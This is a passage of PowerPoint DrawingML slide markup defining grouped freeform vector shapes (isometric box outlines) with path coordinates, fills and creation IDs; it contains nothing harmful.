                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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52" name="Freeform 151">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56D1F25D-0620-4ADD-BD84-D1B30372A4F5}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753 h 2434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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2434">
                              <a:moveTo>
                                <a:pt x="1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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753" name="Freeform 152">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBCDEAE-12BF-4CAC-98C9-2EB5D824E0C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gray">
                        <a:xfrm>
                          <a:off x="585" y="1098"/>
                          <a:ext cx="662" cy="177"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 3732"/>
                            <a:gd name="T1" fmla="*/ 500 h 1001"/>
                            <a:gd name="T2" fmla="*/ 1866 w 3732"/>
                            <a:gd name="T3" fmla="*/ 0 h 1001"/>
                            <a:gd name="T4" fmla="*/ 3732 w 3732"/>
                            <a:gd name="T5" fmla="*/ 500 h 1001"/>
                            <a:gd name="T6" fmla="*/ 1866 w 3732"/>
                            <a:gd name="T7" fmla="*/ 1001 h 1001"/>
                            <a:gd name="T8" fmla="*/ 0 w 3732"/>
                            <a:gd name="T9" fmla="*/ 500 h 1001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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="3732" h="1001">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3732" y="500"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001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E6E6E"/>
                        </a:solidFill>
                        <a:ln w="6350" cmpd="sng">
                          <a:solidFill>
                            <a:srgbClr val="545554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libri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  <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="1683" name="Group 153">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{703AD0FB-AE80-4A79-88A0-C47204FAFEE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19" y="1819"/>
                    <a:ext cx="1009" cy="1024"/>
                    <a:chOff x="1319" y="1819"/>
                    <a:chExt cx="1009" cy="1024"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="1684" name="Group 154">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B91DAAF-FEEA-4A0B-8BF7-B96B7DEBB44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190" y="1819"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1737" name="Freeform 155">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6A42ED2-D68B-4681-AA70-4AC653EE652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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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38" name="Freeform 156">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F190D07-EAB9-4EC7-AEFC-1CC2CEDCDAA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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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39" name="Freeform 157">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F055F655-415E-4B9E-AE79-C251DFF97C0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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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685" name="Group 158">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0352D004-A637-48CE-BD97-3D19FD9B461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758" y="2159"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1734" name="Freeform 159">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE609A60-7054-47AE-BF9A-27E417D276D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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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35" name="Freeform 160">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184A481C-3195-40FE-8C2A-40D68C27776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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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36" name="Freeform 161">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396F07CA-BEAC-460D-B8EE-49A003B139D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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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686" name="Group 162">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C3DE04-FC9B-489F-A1B7-A134004123A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972" y="2327"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1731" name="Freeform 163">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0794AFB1-EA54-42A1-89E1-251A3092FE4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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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32" name="Freeform 164">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9EFAF6D-11A0-4461-BD6D-BBA4078B1E0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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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33" name="Freeform 165">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5E9CF4-539A-4165-A078-907531E67E7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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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687" name="Group 166">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A875884-CB48-4D62-9ACB-E79CCCCDED3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541" y="2669"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1728" name="Freeform 167">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{091A36AE-0602-415C-A6A0-C125226955C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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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9" name="Freeform 168">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4E43AFE-8606-4CC2-819E-D7A7FCFCB33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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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30" name="Freeform 169">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{176F35C6-4DAB-4FE1-9192-98A0713C5E8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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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688" name="Group 170">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04650BCE-7072-4C75-AF4D-7A3EAA61C87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324" y="2502"/>
                      <a:ext cx="138" cy="173"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1725" name="Freeform 171">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA1E1C0-8FDD-46D4-A020-BD404BF6508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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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6" name="Freeform 172">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CE6F50-82B1-4F29-95DE-2C7567091E1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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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7" name="Freeform 173">
                        <a:extLst>
